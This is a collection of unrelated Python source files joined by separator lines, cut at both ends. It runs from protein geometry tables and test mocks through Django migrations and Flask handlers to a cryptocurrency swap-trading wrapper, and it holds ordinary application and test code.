'ARG': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 111.3,
('CG', 'CD', 'NE'): 112.0, ('CD', 'NE', 'CZ'): 124.2,
('NE', 'CZ', 'NH1'): 120.0, ('NE', 'CZ', 'NH2'): 120.0},
'SER': {('CA', 'CB', 'OG'): 111.1},
'THR': {('CA', 'CB', 'OG1'): 109.6, ('CA', 'CB', 'CG2'): 110.5},
'VAL': {('CA', 'CB', 'CG1'): 110.5, ('CA', 'CB', 'CG2'): 110.5},
'TRP': {('CA', 'CB', 'CG'): 113.6, ('CB', 'CG', 'CD1'): 126.8,
('CD1', 'CG', 'CD2'): 106.3, ('CG', 'CD1', 'NE1'): 110.2,
('CG', 'CD2', 'CE2'): 107.2, ('CE2', 'CD2', 'CE3'): 118.9,
('CD2', 'CE2', 'CZ2'): 122.4, ('CD2', 'CE', 'CZ3'): 118.6,
('CE3', 'CZ3', 'CH2'): 121.1},
'TYR': {( 'CA', 'CB', 'CG'): 113.9, ('CB', 'CG', 'CD1'): 120.8,
('CD1', 'CG', 'CD2'): 118.4, ('CG', 'CD1', 'CE1'): 121.2,
('CG', 'CD2', 'CE2'): 121.2, ('CD1', 'CE1', 'CZ'): 119.6,
('CD2', 'CE2', 'CZ'): 119.6, ('CE1', 'CZ', 'OH'): 119.9},
}
BOND_ANGLE_PSEUDO_SIDECHAIN = {'ALA': 89.8283, 'CYS': 118.8, 'ASP': 117.5,
'GLU': 108.9, 'PHE': 126.1, 'GLY': 89.8283, 'HIS': 126.1, 'ILE': 100.3,
'LYS': 111.7, 'LEU': 108.9, 'MET': 103.1, 'ASN': 118.8, 'PRO': 126.1,
'GLN': 106.0, 'ARG': 114.6, 'SER': 91.7, 'THR': 94.5, 'VAL': 88.8,
'TRP': 108.9, 'TYR': 126.1}
def get_bond_length(atom1, atom2, residue):
""" Get the length of a the bond between two given atoms, according to the
residue.
@param atom1: The first atom in the bond.
@type atom1: str (one of the atoms defined in the L{ATOMS} constant)
@param atom2: The second atom in the bond.
@type atom2: str (one of the atoms defined in the L{ATOMS} constant)
@rtype: float
@return: The bond length.
"""
bond_length = 0.0
# Hydrogen atoms are not from Engh, Huber, 1991.
if ATOMS.index(atom2) >= ATOMS.index('H') and \
ATOMS.index(atom2) <= ATOMS.index('H3'):
bond_length = 1.0
else:
# atoms are ordered in the bond length dictionary to avoid
# duplication of entries
if atom1 > atom2:
atom1, atom2 = atom2, atom1
try:
bond_length = BOND_LENGTH_MAINCHAIN[(atom1, atom2)][residue]
except KeyError:
try:
bond_length = BOND_LENGTH_SIDECHAIN[residue][atom1, atom2]
except KeyError:
bond_length = BOND_LENGTH_PSEUDO_SIDECHAIN[residue]
assert bond_length != 0, "Bond length could not be obtained."
return bond_length
def get_bond_angle(atom1, atom2, atom3, residue):
""" Get the angle of the bond between three atoms, according to the residue.
@param atom1: The first atom in the bond.
@type atom1: str (one of the atoms defined in the L{ATOMS} constant)
@param atom2: The second atom in the bond.
@type atom2: str (one of the atoms defined in the L{ATOMS} constant)
@param atom3: The third atom in the bond.
@type atom3: str (one of the atoms defined in the L{ATOMS} constant)
@rtype: float
@return: The bond angle.
"""
bond_angle = 0.0
try:
bond_angle = BOND_ANGLE_MAINCHAIN[(atom1, atom2, atom3)][residue]
except KeyError:
try:
bond_angle = BOND_ANGLE_SIDECHAIN[residue][atom1, atom2, atom3]
except KeyError:
bond_angle = BOND_ANGLE_PSEUDO_SIDECHAIN[residue]
assert bond_angle != 0, "Bond angle could not be obtained."
return bond_angle * math.pi / 180.0
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from st2auth.backends.base import BaseAuthenticationBackend
# auser:apassword in b64
DUMMY_CREDS = 'YXVzZXI6YXBhc3N3b3Jk'
__all__ = [
'DUMMY_CREDS',
'MockAuthBackend',
'MockRequest',
'get_mock_backend'
]
class MockAuthBackend(BaseAuthenticationBackend):
groups = []
def authenticate(self, username, password):
return ((username == 'auser' and password == 'apassword') or
(username == 'username' and password == 'password:password'))
def get_user(self, username):
return username
def get_user_groups(self, username):
return self.groups
class MockRequest():
def __init__(self, ttl):
self.ttl = ttl
user = None
ttl = None
impersonate_user = None
nickname_origin = None
def get_mock_backend(name):
return MockAuthBackend()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Module',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('name', models.CharField(max_length=45)),
('ordernum', models.IntegerField()),
('enabled', models.BooleanField(default=True)),
('description', models.CharField(max_length=45)),
('required', models.CharField(max_length=45, blank=True, null=True)),
],
options={
},
bases=(models.Model,),
),
]
|
# Generated by Django 4.0.3 on 2022-03-09 15:20
import cloudinary.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('image_name', models.CharField(max_length=60)),
('image_date', models.DateTimeField(auto_now_add=True)),
('image_caption', models.TextField(blank=True)),
('likes', models.IntegerField(default=0)),
('comments', models.IntegerField(default=0)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50)),
('date_joined', models.DateTimeField(auto_now_add=True)),
('bio', models.CharField(max_length=500)),
('profile_photo', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Likes',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='mainapp.image')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment', models.CharField(max_length=60)),
('comment_date', models.DateTimeField(auto_now_add=True)),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.image')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
from .core import OcrPredictionHead, HeadOutputKeys
from .ctc import CtcPredictionHead
from .rnn_attention import RnnAttentionHead
from .factory import PredictionHeadsFactory
FACTORY = PredictionHeadsFactory()
FACTORY.register('ctc', CtcPredictionHead)
FACTORY.register('rnn_attn', RnnAttentionHead)
ATTENTION_HEAD_TYPES = set([
'rnn_attn',
])
|
# -*- coding: iso-8859-1 -*-
import pywintypes
from . import utils
class ActiveDirectoryError (Exception):
u"""Base class for all AD Exceptions"""
pass
class MemberAlreadyInGroupError (ActiveDirectoryError):
pass
class MemberNotInGroupError (ActiveDirectoryError):
pass
class BadPathnameError (ActiveDirectoryError):
pass
class AttributeNotFound (ActiveDirectoryError):
pass
class LogonError (ActiveDirectoryError):
pass
def wrapper (winerror_map, default_exception):
u"""Used by each module to map specific windows error codes onto
Python exceptions. Always includes a default which is raised if
no specific exception is found.
"""
def _wrapped (function, *args, **kwargs):
u"""Call a Windows API with parameters, and handle any
exception raised either by mapping it to a module-specific
one or by passing it back up the chain.
"""
try:
return function (*args, **kwargs)
except pywintypes.com_error, (hresult_code, hresult_name, additional_info, parameter_in_error):
hresult_code = utils.signed_to_unsigned (hresult_code)
exception_string = [u"%08X - %s" % (hresult_code, hresult_name)]
if additional_info:
wcode, source_of_error, error_description, whlp_file, whlp_context, scode = additional_info
scode = utils.signed_to_unsigned (scode)
exception_string.append (u" Error in: %s" % source_of_error)
exception_string.append (u" %08X - %s" % (scode, (error_description or "").strip ()))
else:
scode = None
exception = winerror_map.get (hresult_code, winerror_map.get (scode, default_exception))
raise exception (hresult_code, hresult_name, u"\n".join (exception_string))
except pywintypes.error, (errno, errctx, errmsg):
exception = winerror_map.get (errno, default_exception)
raise exception (errno, errctx, errmsg)
except (WindowsError, IOError), err:
exception = winerror_map.get (err.errno, default_exception)
if exception:
raise exception (err.errno, u"", err.strerror)
return _wrapped
ERROR_DS_NO_SUCH_OBJECT = 0x80072030
ERROR_OBJECT_ALREADY_EXISTS = 0x80071392
ERROR_MEMBER_NOT_IN_ALIAS = 0x80070561
ERROR_MEMBER_IN_ALIAS = 0x80070562
E_ADS_BAD_PATHNAME = 0x80005000
ERROR_NOT_IMPLEMENTED = 0x80004001
E_NOINTERFACE = 0x80004002
E_ADS_PROPERTY_NOT_FOUND = 0x8000500D
E_ADS_PROPERTY_NOT_SUPPORTED = 0x80005006
E_ADS_PROPERTY_INVALID = 0x80005007
WINERROR_MAP = {
ERROR_MEMBER_NOT_IN_ALIAS : MemberNotInGroupError,
ERROR_MEMBER_IN_ALIAS : MemberAlreadyInGroupError,
E_ADS_BAD_PATHNAME : BadPathnameError,
ERROR_NOT_IMPLEMENTED : NotImplementedError,
E_ADS_PROPERTY_NOT_FOUND : AttributeError,
E_ADS_PROPERTY_NOT_SUPPORTED : AttributeError,
E_ADS_PROPERTY_INVALID : AttributeError,
0x8009030C : LogonError,
}
wrapped = wrapper (WINERROR_MAP, ActiveDirectoryError)
|
import setuptools
with open('README.md', 'r') as fh:
long_description = fh.read()
setuptools.setup(
name='inkrement',
version='0.0.1',
author='Eric Boxer',
author_email='ecb2198@columbia.edu',
description='Incremental data visualization in python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/Ecboxer/inkrement',
packages=['inkrement'],
install_requires=[
'matplotlib.pyplot>=2.2.3'
],
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent'
]
)
|
# coding: utf-8
from abc import abstractmethod
from .tui import TUI
class TUIDisplay(TUI):
def __init__(self, inventory):
super(TUIDisplay, self).__init__()
self.term = TUI()
self.inventory = inventory
# adjust column width to fit the longest content
def format_columns(self, data):
result = []
col_width = []
for row in data:
i = 0
for word in row:
if not word:
continue
try:
col_width[i] = max(len(word), col_width[i])
except IndexError:
col_width.append(len(word))
i += 1
for row in data:
i = 0
wide_row = []
for word in row:
if not word:
continue
wide_row.append(word.ljust(col_width[i] + 2))
i += 1
result.append("".join(wide_row))
return result
@abstractmethod
def display(self):
raise NotImplementedError
|
import pytest
from zipfile import ZipFile
from pyPreservica import *
def test_export_file_wait():
client = EntityAPI()
asset = client.asset("c365634e-9fcc-4ea1-b47f-077f55df9d64")
zip_file = client.export_opex_sync(asset)
assert os.path.exists(zip_file)
assert 1066650 < os.stat(zip_file).st_size
with ZipFile(zip_file, 'r') as zipObj:
assert len(zipObj.namelist()) == 6
os.remove(zip_file)
def test_export_file_no_wait():
client = EntityAPI()
asset = client.asset("c365634e-9fcc-4ea1-b47f-077f55df9d64")
pid = client.export_opex_async(asset)
status = "ACTIVE"
while status == "ACTIVE":
status = client.get_async_progress(pid)
assert status == "COMPLETED"
zip_file = client.download_opex(pid)
assert os.path.exists(zip_file)
assert 1066650 < os.stat(zip_file).st_size
with ZipFile(zip_file, 'r') as zipObj:
assert len(zipObj.namelist()) == 6
os.remove(zip_file)
|
from pprint import pprint
from flask import jsonify, request
from flask_marshmallow.sqla import ValidationError
from flask_restful import Resource, abort
from flask_auth.app.extensions.database.database_framework import db
from flask_auth.app.blueprints.users.models import UserModel
from flask_auth.app.blueprints.users.schemas import (
UserListSchema,
UserCreateSchema,
UserDetailsSchema,
UserUpdateSchema,
)
from flask_auth.app.common.loaders import get_swagger_file_path
from flasgger import swag_from
class UserCreateListResource(Resource):
__module__ = "users"
user_schema = UserListSchema()
users_schema = UserListSchema(many=True)
user_create_schema = UserCreateSchema()
user_model = UserModel()
@swag_from(get_swagger_file_path(__name__, "list.yml"))
def get(self):
user_list = self.users_schema.dump(self.user_model.query.all())
if not user_list:
return abort(401, message="There is no user registered")
return user_list
@swag_from(get_swagger_file_path(__name__, "create.yml"))
def post(self):
try:
user = self.user_create_schema.load(request.json)
db.session.add(user)
db.session.commit()
db.session.close()
return jsonify(message="User created successfully")
except ValidationError as error:
pprint(error.messages)
return abort(401)
class UserDetailUpdateRemoveResource(Resource):
user_details_schema = UserDetailsSchema()
user_update_schema = UserUpdateSchema()
user_model = UserModel()
@swag_from(get_swagger_file_path(__name__, "read.yml"))
def get(self, _id: int):
user = self.user_details_schema.dump(
self.user_model.query.filter_by(id=_id).first()
)
if not user:
return abort(401, message="User not found")
return user
# TODO: Improve this update approach
@swag_from(get_swagger_file_path(__name__, "update.yml"))
def put(self, _id: int):
try:
db_user = self.user_model.query.filter_by(id=_id).first()
if not db_user:
return abort(401, message="User not found")
new_user_values = self.user_update_schema.load(request.json)
db_user.login = new_user_values.login
db.session.commit()
db.session.close()
return jsonify(message="User updated successfully")
except ValidationError as error:
pprint(error.messages)
return abort(401)
@swag_from(get_swagger_file_path(__name__, "delete.yml"))
def delete(self, _id: int):
try:
user = self.user_model.query.filter_by(id=_id).first()
if user:
db.session.delete(user)
db.session.commit()
db.session.close()
return jsonify(message="User removed successfully")
return abort(401, message="User not found")
except ValidationError as error:
pprint(error.messages)
return abort(
401,
message="Some information is lacking or invalid. Please check them and try it again.",
)
|
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
if len(nums) < 2:
raise Exception("Invalid Array")
pre_prod = [1] * len(nums)
post_prod = [1] * len(nums)
res = [None] * len(nums)
i = 1
while i <= len(nums) - 1:
pre_prod[i] = pre_prod[i - 1] * nums[i - 1]
i += 1
i = len(nums) - 2
while i >= 0:
post_prod[i] = post_prod[i + 1] * nums[i + 1]
i -= 1
for i in range(len(nums)):
res[i] = pre_prod[i] * post_prod[i]
return res
|
'''
Node metadata.
Used when we encounter variable names in our AST.
Essentially, we're trying to deduce how variables are used. As a key part of
torc involves pulling data from all around the document in order to provide
document-wide data to the RNN as the RNN looks at set of lines, we use
NodeMetadata in order to keep track of what is what. Then, when it comes time,
we aggregate our metadata into a new metadata instance (needs to be split into
two different classes). The AST to torc translator then takes the metadata
and essentially replaces the appropriate variable or variables with the
metadata from this class as required.
In doing this, we effectively contextualize each variable in such a way that
the RNN has access to the way to the variable is used relative to both itself
as well as other variables present in the document.
Note: We have some extra functions and code present from an earlier version.
Because this is still a proof of concept, I have not yet taken the time to
fully clean out old code from when I was exploring if this concept is event
feasible.
'''
import json, time, math, re
from copy import deepcopy
from collections import defaultdict, Counter
import pandas as pd
class NodeMetadata:
def __cmp__(self, other):
return self.__eq__(other)
#do we really need __cmp__, __hash__, and __eq__?
def __hash__(self):
#This was for some earlier string-based metadata tags
#We no longer use those tags but I need to check the AST translator
#to ensure we do not directly or indirectly call this function.
return hash(self._name + '!!' + self._intent)
def __eq__(self, other):
if type(other) == type(self):
return other._name == self._name and \
other._intent == self._intent
return False
def set_standards(self, vocab):
maxcalled = max([vocab[x].get_called() for x in vocab]) + 1.
maxalts = max([len(vocab[x].get_aliases()) for x in vocab]) + 1.
maxintent_data = max([vocab[x].get_data_intent_count() for x in vocab]) + 1.
maxintent_func = max([vocab[x].get_func_intent_count() for x in vocab]) + 1.
localized_intent_data = self.get_data_intent_count() + self.get_func_intent_count() + 1
localized_intent_func = self.get_data_intent_count() + self.get_func_intent_count() + 1
#fuzz_amt is no longer needed, keeping around until a later update
self._standard_intent_data_max = (round(self.get_data_intent_count() / float(maxintent_data), self._FUZZ_AMT))
self._standard_intent_func_max = (round(self.get_func_intent_count() / float(maxintent_func), self._FUZZ_AMT))
self._standard_intent_data = (round(self.get_data_intent_count() / float(localized_intent_data), self._FUZZ_AMT))
self._standard_intent_func = (round(self.get_func_intent_count() / float(localized_intent_func), self._FUZZ_AMT))
self._standard_called = (round(self.get_called() / float(maxcalled), self._FUZZ_AMT))
self._standard_aliases = (round(len(self.get_aliases()) / float(maxalts), self._FUZZ_AMT))
def get_standardized_intent_data(self):
return self._standard_intent_data
def get_standardized_intent_func(self):
return self._standard_intent_func
def get_standardized_called(self):
return self._standard_called
def get_standardized_aliases(self):
return self._standard_aliases
def get_standardized_intent_data_max(self):
return self._standard_intent_data_max
def get_standardized_intent_func_max(self):
return self._standard_intent_func_max
def called(self):
self._called += 1
def get_func_intent_count(self):
return self._func_count
def get_data_intent_count(self):
return self._data_count
def set_func_intent_count(self, f_count):
self._func_count = f_count
def set_data_intent_count(self, d_count):
self._data_count = d_count
def get_called(self):
return self._called
def get_aliases(self):
return self._aliases
def get_intent(self):
return self._intent
def get_name(self):
return self._name
def set_called(self, called):
self._called = called
def set_aliases(self, aliases):
self._aliases = aliases
def set_intent(self, intent):
self._intent = intent
def set_name(self, name):
self._name = name
def __init__(self, fuzz_amount=10):
self._called = 1
self._name = ''
self._intent = ''
self._aliases = []
self._func_count = 0
self._data_count = 0
self._FUZZ_AMT = fuzz_amount
|
import os
import json
import multiprocessing
import random
import math
from math import log2, floor
from functools import partial
from contextlib import contextmanager, ExitStack
from pathlib import Path
from shutil import rmtree
from collections import Counter
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import torch
import torchvision
from torch.cuda.amp import autocast, GradScaler
from torch.optim import Adam
from torch import nn, einsum
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torch.autograd import grad as torch_grad
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import Sampler
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.dataset import Dataset
from PIL import Image
import pandas as pd
from kornia import filter2D
from tensorboardX import SummaryWriter
import numpy as np
import torch.distributed as dist
from tqdm import tqdm
import torch.multiprocessing as mp
import fire
from einops import rearrange
from gsa_pytorch import GSA
from linear_attention_transformer import ImageLinearAttention
from torchvision import transforms
|
"""
okex永续合约
https://www.okex.com/docs/zh/#swap-README
Author: Gary-Hertel
Date: 2020/10/27
email: purequant@foxmail.com
"""
import time
from purequant.exchange.okex import swap_api as okexswap
from purequant.config import config
from purequant.exceptions import *
from purequant.logger import logger
class OKEXSWAP:
def __init__(self, access_key, secret_key, passphrase, instrument_id, margin_mode=None, leverage=None):
"""
okex永续合约
:param access_key:
:param secret_key:
:param passphrase:
:param instrument_id: 例如:"BTC-USDT-SWAP", "BTC-USD-SWAP"
:param leverage:杠杆倍数,如不填则默认设置20倍杠杆
"""
self.__access_key = access_key
self.__secret_key = secret_key
self.__passphrase = passphrase
self.__instrument_id = instrument_id
self.__okex_swap = okexswap.SwapAPI(self.__access_key, self.__secret_key, self.__passphrase)
self.__leverage = leverage or 20
if margin_mode == "fixed":
try:
self.__okex_swap.set_leverage(leverage=self.__leverage, instrument_id=self.__instrument_id, side=1)
self.__okex_swap.set_leverage(leverage=self.__leverage, instrument_id=self.__instrument_id, side=2)
except Exception as e:
logger.error("OKEX永续合约设置杠杆倍数失败!请检查账户是否已设置成逐仓模式!错误:{}".format(str(e)))
else:
try:
self.__okex_swap.set_leverage(leverage=self.__leverage, instrument_id=self.__instrument_id, side=3)
except Exception as e:
logger.error("OKEX永续合约设置杠杆倍数失败!请检查账户是否已设置成全仓模式!错误:{}".format(str(e)))
def get_single_equity(self, currency):
"""
获取单个合约账户的权益
:param currency: 例如"TRX-USDT-SWAP"
:return:返回浮点数
"""
data = self.__okex_swap.get_coin_account(instrument_id=currency)
result = float(data["info"]["equity"])
return result
def buy(self, price, size, order_type=None):
if config.backtest is False: # 实盘模式
order_type = order_type or 0 # 如果不填order_type,则默认为普通委托
try:
result = self.__okex_swap.take_order(self.__instrument_id, 1, price, size, order_type=order_type)
except Exception as e:
raise SendOrderError(e)
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
# 如果订单状态不是"完全成交"或者"失败"
if config.price_cancellation: # 选择了价格撤单时,如果最新价超过委托价一定幅度,撤单重发,返回下单结果
if order_info["订单状态"] == "等待成交":
if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.time_cancellation: # 选择了时间撤单时,如果委托单发出多少秒后不成交,撤单重发,直至完全成交,返回成交结果
time.sleep(config.time_cancellation_seconds)
order_info = self.get_order_info(order_id=result['order_id'])
if order_info["订单状态"] == "等待成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buy(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.automatic_cancellation:
# 如果订单未完全成交,且未设置价格撤单和时间撤单,且设置了自动撤单,就自动撤单并返回下单结果与撤单结果
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
return {"【交易提醒】下单结果": state}
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
else: # 未启用交易助手时,下单并查询订单状态后直接返回下单结果
return {"【交易提醒】下单结果": order_info}
else: # 回测模式
return "回测模拟下单成功!"
def sell(self, price, size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
try:
result = self.__okex_swap.take_order(self.__instrument_id, 3, price, size, order_type=order_type)
except Exception as e:
raise SendOrderError(e)
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
# 如果订单状态不是"完全成交"或者"失败"
if config.price_cancellation: # 选择了价格撤单时,如果最新价超过委托价一定幅度,撤单重发,返回下单结果
if order_info["订单状态"] == "等待成交":
if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.time_cancellation: # 选择了时间撤单时,如果委托单发出多少秒后不成交,撤单重发,直至完全成交,返回成交结果
time.sleep(config.time_cancellation_seconds)
order_info = self.get_order_info(order_id=result['order_id'])
if order_info["订单状态"] == "等待成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sell(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.automatic_cancellation:
# 如果订单未完全成交,且未设置价格撤单和时间撤单,且设置了自动撤单,就自动撤单并返回下单结果与撤单结果
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
return {"【交易提醒】下单结果": state}
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
else: # 未启用交易助手时,下单并查询订单状态后直接返回下单结果
return {"【交易提醒】下单结果": order_info}
else: # 回测模式
return "回测模拟下单成功!"
def sellshort(self, price, size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
try:
result = self.__okex_swap.take_order(self.__instrument_id, 2, price, size, order_type=order_type)
except Exception as e:
raise SendOrderError(e)
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
# 如果订单状态不是"完全成交"或者"失败"
if config.price_cancellation: # 选择了价格撤单时,如果最新价超过委托价一定幅度,撤单重发,返回下单结果
if order_info["订单状态"] == "等待成交":
if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
if float(self.get_ticker()['last']) <= price * (1 - config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.time_cancellation: # 选择了时间撤单时,如果委托单发出多少秒后不成交,撤单重发,直至完全成交,返回成交结果
time.sleep(config.time_cancellation_seconds)
order_info = self.get_order_info(order_id=result['order_id'])
if order_info["订单状态"] == "等待成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
